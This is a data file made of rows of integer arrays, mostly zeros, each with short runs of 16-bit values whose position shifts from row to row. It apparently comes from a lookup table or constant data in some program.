[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 55684, 16449, 4070, 52486, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 4864, 15552, 55600, 22476, 32275, 17712],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 16516, 22337, 31974, 18950, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 30464, 9664, 6000, 23644, 25459],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 42884, 28225, 59878, 50950, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 39168, 20032, 45456, 32996, 7321, 5554],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 3716, 34113, 22246, 17414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 55808, 18048, 48544, 60520, 19162, 25245],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 30084, 40001, 50150, 49414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 28416, 13248, 57072, 10044, 34927, 58020],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 56452, 45889, 12518, 15878, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 31232, 36480, 55200, 1256, 4855],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 17284, 51777, 40422, 47878, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 5376, 19776, 63824, 45268, 43797, 58502],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 43652, 57665, 2790, 14342, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 1536, 61824, 4192, 46872, 4614, 14081],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 4484, 63553, 30694, 46342, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 2816, 64192, 55472, 54188, 33291, 45016],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 30852, 3905, 58598, 12806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 36096, 64320, 63696, 40372, 7483],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 57220, 9793, 20966, 44806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 53504, 40000, 38160, 5572, 32465, 21786],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 18052, 15681, 48870, 11270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 29184, 11392, 18208, 6856, 22386, 16421],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 44420, 21569, 11238, 43270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 59136, 37312, 34416, 19740, 59111, 32972],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 5252, 27457, 39142, 9734, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 11008, 21184, 58943],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 31620, 33345, 1510, 41734, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 52480, 15168, 17616, 8116, 13261, 39790],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 57988, 39233, 29414, 8198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 7680, 63360, 8672, 18296, 59166, 49673],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 18820, 45121, 57318, 40198, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 768, 63680, 43056, 33676, 29443, 59776],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 45188, 51009, 19686, 6662, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 58112, 57536, 7728, 36876, 37379],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 6020, 56897, 47590, 38662, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 2304, 10816, 51344, 16036, 42505, 43906],
